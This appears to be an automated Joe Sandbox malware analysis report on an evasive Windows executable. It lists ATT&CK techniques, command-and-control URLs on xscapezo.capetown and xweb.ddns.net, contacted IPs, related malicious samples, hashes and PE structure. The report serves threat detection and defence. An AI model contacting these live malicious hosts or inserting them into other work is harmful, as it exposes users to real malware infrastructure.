Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	21 Windows Management Instrumentation	1 DLL Side-Loading	12 Process Injection	121 Virtualization/Sandbox Evasion	OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	11 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Native API	Boot or Logon Initialization Scripts	1 DLL Side-Loading	12 Process Injection	LSASS Memory	1 Query Registry	Remote Desktop Protocol	Data from Removable Media	1 Non-Standard Port	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	1 Deobfuscate/Decode Files or Information	Security Account Manager	241 Security Software Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	1 Ingress Tool Transfer	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	3 Obfuscated Files or Information	NTDS	1 Process Discovery	Distributed Component Object Model	Input Capture	3 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	121 Virtualization/Sandbox Evasion	SSH	Keylogging	14 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	Steganography	Cached Domain Credentials	1 System Network Configuration Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	Compile After Delivery	DCSync	4 System Information Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe	11%	ReversingLabs
1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
http://xscapezo.capetown:8080/V	0%	Avira URL Cloud	safe
http://xscapezo.capetown:8080on3Microsoft	0%	Avira URL Cloud	safe
http://xscapezo.capetown:8080/7	0%	Avira URL Cloud	safe
http://xweb.ddns.net:80807http://xscapezo.capetown:8080	0%	Avira URL Cloud	safe
http://xscapezo.capetown:8080	0%	Avira URL Cloud	safe
http://xscapezo.capetown:8080/?	0%	Avira URL Cloud	safe
http://xscapezo.capetown:8080/P	0%	Avira URL Cloud	safe
http://xscapezo.capetown:8080/t	0%	Avira URL Cloud	safe
http://xscapezo.capetown:8080/yG	0%	Avira URL Cloud	safe
http://xscapezo.capetown:8080/lR&F	0%	Avira URL Cloud	safe
http://xscapezo.capetown:80800	0%	Avira URL Cloud	safe
http://xscapezo.capetown:80802.40	0%	Avira URL Cloud	safe
http://xweb.ddns.net:80806WinHttp.WinHttpRequest.5.16WinHttp.WinHttpRequest.5.16WinHttp.WinHttpReque	0%	Avira URL Cloud	safe
http://xscapezo.capetown:8080/	0%	Avira URL Cloud	safe
http://xweb.ddns.net:8080	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
checkip.eu-west-1.prod.check-ip.aws.a2z.com	52.17.181.189	true	false	high
ipinfo.io	34.117.59.81	true	false	high
xscapezo.capetown	31.13.224.69	true	false	unknown
checkip.amazonaws.com	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://ipinfo.io/country	false		high
https://checkip.amazonaws.com/	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://xscapezo.capetown:8080on3Microsoft	1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe, 00000000.00000002.2961622131.0000000001B50000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://xweb.ddns.net:80807http://xscapezo.capetown:8080	1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe, 00000000.00000002.2961622131.0000000001B50000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://xscapezo.capetown:8080/?	1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe, 00000000.00000002.2961318785.000000000161C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ipinfo.io/	1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe, 00000000.00000003.1879655271.00000000015AB000.00000004.00000020.00020000.00000000.sdmp, 1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe, 00000000.00000003.1879788669.00000000015B8000.00000004.00000020.00020000.00000000.sdmp	false		high
http://xscapezo.capetown:8080/7	1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe, 00000000.00000003.2687058268.000000000161C000.00000004.00000020.00020000.00000000.sdmp, 1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe, 00000000.00000002.2961318785.000000000161C000.00000004.00000020.00020000.00000000.sdmp, 1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe, 00000000.00000003.2672859368.000000000161C000.00000004.00000020.00020000.00000000.sdmp, 1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe, 00000000.00000003.2687208163.000000000161F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ipinfo.io/1	1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe, 00000000.00000003.1879655271.00000000015AB000.00000004.00000020.00020000.00000000.sdmp, 1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe, 00000000.00000003.1879788669.00000000015B8000.00000004.00000020.00020000.00000000.sdmp	false		high
http://xscapezo.capetown:8080/V	1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe, 00000000.00000002.2961318785.000000000161C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://xscapezo.capetown:8080/lR&F	1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe, 00000000.00000003.2687132172.00000000015F7000.00000004.00000020.00020000.00000000.sdmp, 1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe, 00000000.00000003.2672949046.00000000015F7000.00000004.00000020.00020000.00000000.sdmp, 1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe, 00000000.00000002.2961318785.0000000001607000.00000004.00000020.00020000.00000000.sdmp, 1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe, 00000000.00000003.2687184938.0000000001606000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://xscapezo.capetown:8080	1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe, 00000000.00000002.2961622131.0000000001B50000.00000004.00001000.00020000.00000000.sdmp, 1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe, 00000000.00000002.2961318785.000000000158D000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://xscapezo.capetown:8080/t	1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe, 00000000.00000002.2961318785.000000000158D000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://xscapezo.capetown:8080/P	1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe, 00000000.00000002.2961318785.000000000158D000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ipinfo.io/country=	1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe, 00000000.00000003.1879655271.00000000015AB000.00000004.00000020.00020000.00000000.sdmp, 1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe, 00000000.00000003.1879788669.00000000015B8000.00000004.00000020.00020000.00000000.sdmp	false		high
http://xscapezo.capetown:8080/yG	1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe, 00000000.00000003.2687132172.00000000015F7000.00000004.00000020.00020000.00000000.sdmp, 1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe, 00000000.00000003.2672949046.00000000015F7000.00000004.00000020.00020000.00000000.sdmp, 1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe, 00000000.00000002.2961318785.0000000001607000.00000004.00000020.00020000.00000000.sdmp, 1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe, 00000000.00000003.2687184938.0000000001606000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://xscapezo.capetown:80802.40	1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe, 00000000.00000002.2961622131.0000000001B50000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ipinfo.io/countryx2	1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe, 00000000.00000003.1879655271.00000000015AB000.00000004.00000020.00020000.00000000.sdmp, 1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe, 00000000.00000003.1879788669.00000000015B8000.00000004.00000020.00020000.00000000.sdmp	false		high
http://xscapezo.capetown:80800	1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe, 00000000.00000002.2961622131.0000000001B50000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://xscapezo.capetown:8080/	1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe, 00000000.00000002.2961318785.000000000158D000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://xweb.ddns.net:80806WinHttp.WinHttpRequest.5.16WinHttp.WinHttpRequest.5.16WinHttp.WinHttpReque	1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe, 00000000.00000002.2961622131.0000000001B50000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://xweb.ddns.net:8080	1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe, 00000000.00000002.2961622131.0000000001B50000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
31.13.224.69	xscapezo.capetown	Bulgaria	48584	SARNICA-ASBG	false
34.117.59.81	ipinfo.io	United States	139070	GOOGLE-AS-APGoogleAsiaPacificPteLtdSG	false
52.17.181.189	checkip.eu-west-1.prod.check-ip.aws.a2z.com	United States	16509	AMAZON-02US	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1575960
Start date and time:	2024-12-16 12:17:10 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 27s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	11
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe
Detection:	MAL
Classification:	mal60.evad.winEXE@10/0@3/3
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 86% Number of executed functions: 32 Number of non-executed functions: 50
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded IPs from analysis (whitelisted): 172.202.163.200, 13.107.246.63, 52.149.20.212
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtDeviceIoControlFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
VT rate limit hit for: 1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe

Simulations

Behavior and APIs

Time	Type	Description
06:18:21	API Interceptor	202x Sleep call for process: 1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe modified
06:18:24	API Interceptor	3x Sleep call for process: WMIC.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
31.13.224.69	Evjm8L1nEb.exe	Get hash	malicious	Unknown	Browse	xscapezo.capetown:8080/
31.13.224.69	Evjm8L1nEb.exe	Get hash	malicious	Unknown	Browse	xscapezo.capetown:8080/
34.117.59.81	file.exe	Get hash	malicious	Invicta Stealer, XWorm	Browse	ipinfo.io/json
	Code%20Send%20meta%20Discord%20EXE.ps1	Get hash	malicious	Unknown	Browse	ipinfo.io/json
	idl57nk7gk.exe	Get hash	malicious	Neshta	Browse	ipinfo.io/json
	idl57nk7gk.exe	Get hash	malicious	Neshta	Browse	ipinfo.io/json
	FormulariomillasbonusLATAM_GsqrekXCVBmUf.cmd	Get hash	malicious	Unknown	Browse	ipinfo.io/json
	172.104.150.66.ps1	Get hash	malicious	Unknown	Browse	ipinfo.io/json
	VertusinstruccionesFedEX_66521.zip	Get hash	malicious	Unknown	Browse	ipinfo.io/json
	UjbjOP.ps1	Get hash	malicious	Unknown	Browse	ipinfo.io/json
	I9xuKI2p2B.ps1	Get hash	malicious	Unknown	Browse	ipinfo.io/json
	licarisan_api.exe	Get hash	malicious	Icarus	Browse	ipinfo.io/ip

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
ipinfo.io	file.exe	Get hash	malicious	Unknown	Browse	34.117.59.81
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, RedLine, Stealc, Vidar	Browse	34.117.59.81
	file.exe	Get hash	malicious	Unknown	Browse	34.117.59.81
	file.exe	Get hash	malicious	Invicta Stealer, XWorm	Browse	34.117.59.81
	http://enteolcl.top/	Get hash	malicious	Unknown	Browse	34.117.59.81
	Product Blueprint..html	Get hash	malicious	HTMLPhisher	Browse	34.117.59.81
	dYUteuvmHn.exe	Get hash	malicious	Unknown	Browse	34.117.59.81
	https://drive.google.com/file/d/1yoYdaJg2olHzjqEKXjn6nnXKPPak7HoL/view?usp=sharing_eil&ts=675747b9	Get hash	malicious	Unknown	Browse	34.117.59.81
	zW72x5d91l.bat	Get hash	malicious	Unknown	Browse	34.117.59.81
	https://copilotse.blob.core.windows.net/$web/hgyxxxtrdfr76tfgfs821yhgh.html?sp=r&st=2024-12-08T12:55:44Z&se=2024-12-31T20:55:44Z&spr=https&sv=2022-11-02&sr=b&sig=7dYMitXSX9zEmg0mEsN7rfqS0sBAZEqtrbG4v8YyfsM%3D#robert.webber@phillyshipyard.com	Get hash	malicious	HTMLPhisher	Browse	34.117.59.81
xscapezo.capetown	Evjm8L1nEb.exe	Get hash	malicious	Unknown	Browse	31.13.224.69
	ugisGK1R1q.exe	Get hash	malicious	DarkVision Rat	Browse	31.13.224.69
	Evjm8L1nEb.exe	Get hash	malicious	Unknown	Browse	31.13.224.69
checkip.eu-west-1.prod.check-ip.aws.a2z.com	Evjm8L1nEb.exe	Get hash	malicious	Unknown	Browse	54.74.44.6
	Evjm8L1nEb.exe	Get hash	malicious	Unknown	Browse	52.49.226.227
	exe028.exe	Get hash	malicious	AgentTesla	Browse	34.247.132.162
	exe028.exe	Get hash	malicious	Unknown	Browse	63.32.212.245
	setup.exe	Get hash	malicious	Unknown	Browse	3.248.31.219
	1.cmd	Get hash	malicious	Unknown	Browse	54.77.225.185
	2.cmd	Get hash	malicious	Unknown	Browse	18.203.170.139
	fL271NVAru.exe	Get hash	malicious	Unknown	Browse	34.245.248.194
	fL271NVAru.exe	Get hash	malicious	Unknown	Browse	54.72.227.37
	ExeFile (277).exe	Get hash	malicious	RedLine	Browse	54.73.172.143

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
AMAZON-02US	arm4.elf	Get hash	malicious	Mirai	Browse	52.25.126.226
	main_sh4.elf	Get hash	malicious	Mirai	Browse	54.171.230.55
	ppc.elf	Get hash	malicious	Mirai	Browse	54.253.166.233
	i686.elf	Get hash	malicious	Mirai	Browse	54.119.189.16
	la.bot.mips.elf	Get hash	malicious	Mirai	Browse	54.171.230.55
	PAYMENT RECEIPT.html	Get hash	malicious	HTMLPhisher	Browse	13.227.8.110
	debug.dbg.elf	Get hash	malicious	Mirai, Moobot	Browse	108.142.47.109
	m68k.elf	Get hash	malicious	Mirai	Browse	18.175.186.201
	powerpc.elf	Get hash	malicious	Mirai	Browse	34.249.145.219
	mipsel.elf	Get hash	malicious	Mirai	Browse	54.171.230.55
GOOGLE-AS-APGoogleAsiaPacificPteLtdSG	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, Vidar	Browse	34.117.188.166
	P0HV8mjHS1.exe	Get hash	malicious	Credential Flusher	Browse	34.117.188.166
	P0HV8mjHS1.exe	Get hash	malicious	Credential Flusher	Browse	34.117.188.166
	mdPov8VTwi.exe	Get hash	malicious	Credential Flusher	Browse	34.117.188.166
	mdPov8VTwi.exe	Get hash	malicious	Credential Flusher	Browse	34.117.188.166
	arm6.elf	Get hash	malicious	Unknown	Browse	34.117.135.65
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse	34.117.188.166
	armv5l.elf	Get hash	malicious	Unknown	Browse	34.119.157.208
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse	34.117.188.166
	nmy4mJXEaz.exe	Get hash	malicious	Credential Flusher	Browse	34.117.188.166
SARNICA-ASBG	debug.dbg.elf	Get hash	malicious	Mirai, Moobot	Browse	93.123.109.208
	x86_64.elf	Get hash	malicious	Mirai, Moobot	Browse	93.123.109.208
	spc.elf	Get hash	malicious	Mirai, Moobot	Browse	93.123.109.208
	m68k.elf	Get hash	malicious	Mirai, Moobot	Browse	93.123.109.208
	ppc.elf	Get hash	malicious	Mirai, Moobot	Browse	93.123.109.208
	arm.elf	Get hash	malicious	Mirai, Moobot	Browse	93.123.109.208
	x86.elf	Get hash	malicious	Mirai, Moobot	Browse	93.123.109.208
	arm7.elf	Get hash	malicious	Mirai, Moobot	Browse	93.123.109.208
	mpsl.elf	Get hash	malicious	Mirai, Moobot	Browse	93.123.109.208
	Estado.de.cuenta.xls	Get hash	malicious	AveMaria, UACMe	Browse	94.156.167.55

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	h.html	Get hash	malicious	Unknown	Browse	34.117.59.81 52.17.181.189
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, Vidar	Browse	34.117.59.81 52.17.181.189
	UUH30xVTpr.exe	Get hash	malicious	LummaC, Stealc	Browse	34.117.59.81 52.17.181.189
	4TPPuMwzSA.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	34.117.59.81 52.17.181.189
	yYJUaOwKa8.exe	Get hash	malicious	LummaC	Browse	34.117.59.81 52.17.181.189
	Wqd6nMOfmG.exe	Get hash	malicious	LummaC, Stealc	Browse	34.117.59.81 52.17.181.189
	hiip7UoiAq.exe	Get hash	malicious	LummaC	Browse	34.117.59.81 52.17.181.189
	AzunBFiz02.exe	Get hash	malicious	LummaC	Browse	34.117.59.81 52.17.181.189
	MessengerAdmin.exe	Get hash	malicious	LummaC	Browse	34.117.59.81 52.17.181.189
	SOjID1t3un.exe	Get hash	malicious	LummaC	Browse	34.117.59.81 52.17.181.189

File type:	PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Entropy (8bit):	6.2915290015918925
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe
File size:	231'936 bytes
MD5:	5b74ba5d3f7a0aff3dea2d3ae9bb1a59
SHA1:	e872b3d30b3da56ac0cafb905087d595c129d73b
SHA256:	b84745937d020b9750842b35590589aadf47153c995f266a3f44dae8b1ff51d8
SHA512:	1f4fb6efb04f3b4c57b92271996bd7008462660cd51ed6ee5144c2e073c3d090e11864ce0963ab996030b174400581699bc35d3566d2cd54a6e7137fa82114b5
SSDEEP:	3072:PtjlDNJxzpxhot+5XDTzcsNsEYwszSHRGhYlW5SQUxk5ja:Pp+tErcslYZYw9QkU
TLSH:	EA340815E202C4B5C43356B6998ED5A7A610BF3681239D0FBECE0F58F336B01592E76B
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....>g...............$..........................@.................................W.....@... ............................

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x4010ba
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE, DEBUG_STRIPPED
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x673EE9D5 [Thu Nov 21 08:05:41 2024 UTC]
TLS Callbacks:	0x41a51c, 0x41a5b3, 0x4228ae
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	12964e2649ce9036e2a1286774ae86cc

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
sub esp, 18h
mov dword ptr [ebp-0Ch], 000000FFh
mov dword ptr [004382E0h], 00000001h
call 00007F24A46C9991h
mov dword ptr [ebp-0Ch], eax
mov eax, dword ptr [ebp-0Ch]
leave
ret
push ebp
mov ebp, esp
sub esp, 18h
mov dword ptr [ebp-0Ch], 000000FFh
mov dword ptr [004382E0h], 00000000h
call 00007F24A46C996Dh
mov dword ptr [ebp-0Ch], eax
mov eax, dword ptr [ebp-0Ch]
leave
ret
lea ecx, dword ptr [esp+04h]
and esp, FFFFFFF0h
push dword ptr [ecx-04h]
push ebp
mov ebp, esp
push ecx
sub esp, 00000094h
mov dword ptr [ebp-0Ch], 00000000h
mov dword ptr [ebp-10h], 00000000h
mov dword ptr [esp+08h], 00000044h
mov dword ptr [esp+04h], 00000000h
lea eax, dword ptr [ebp-7Ch]
mov dword ptr [esp], eax
call 00007F24A46E9156h
mov eax, dword ptr [004382E0h]
test eax, eax
je 00007F24A46C9972h
lea eax, dword ptr [ebp-7Ch]
mov dword ptr [esp], eax
mov eax, dword ptr [00439278h]
call eax
sub esp, 04h
mov dword ptr [ebp-18h], 00000000h
mov dword ptr [ebp-20h], 00000018h
mov eax, dword ptr [ebp-20h]
mov eax, dword ptr fs:[eax]
mov dword ptr [ebp-24h], eax
mov eax, dword ptr [ebp-24h]
mov eax, dword ptr [eax+04h]
mov dword ptr [ebp-1Ch], eax
mov dword ptr [ebp-14h], 00000000h
jmp 00007F24A46C9984h

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x39000	0xd2c	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x3c000	0x224	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x3d000	0x1974	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x306c0	0x18	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x39230	0x1e0	.idata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x2a684	0x2a800	f192cbeafafbd036787705e45cd5893c	False	0.43780445772058824	data	6.144924956418916	IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data	0x2c000	0x26c	0x400	cd4faee918b6d039163459e9ae43b365	False	0.2353515625	Matlab v4 mat-file (little endian) \240\326B, numeric, rows 0, columns 0, imaginary	1.8158646800282847	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata	0x2d000	0x4d74	0x4e00	26a00dcabd068bb3c2a6c5d84f4dd568	False	0.4118088942307692	data	5.844738930570382	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ
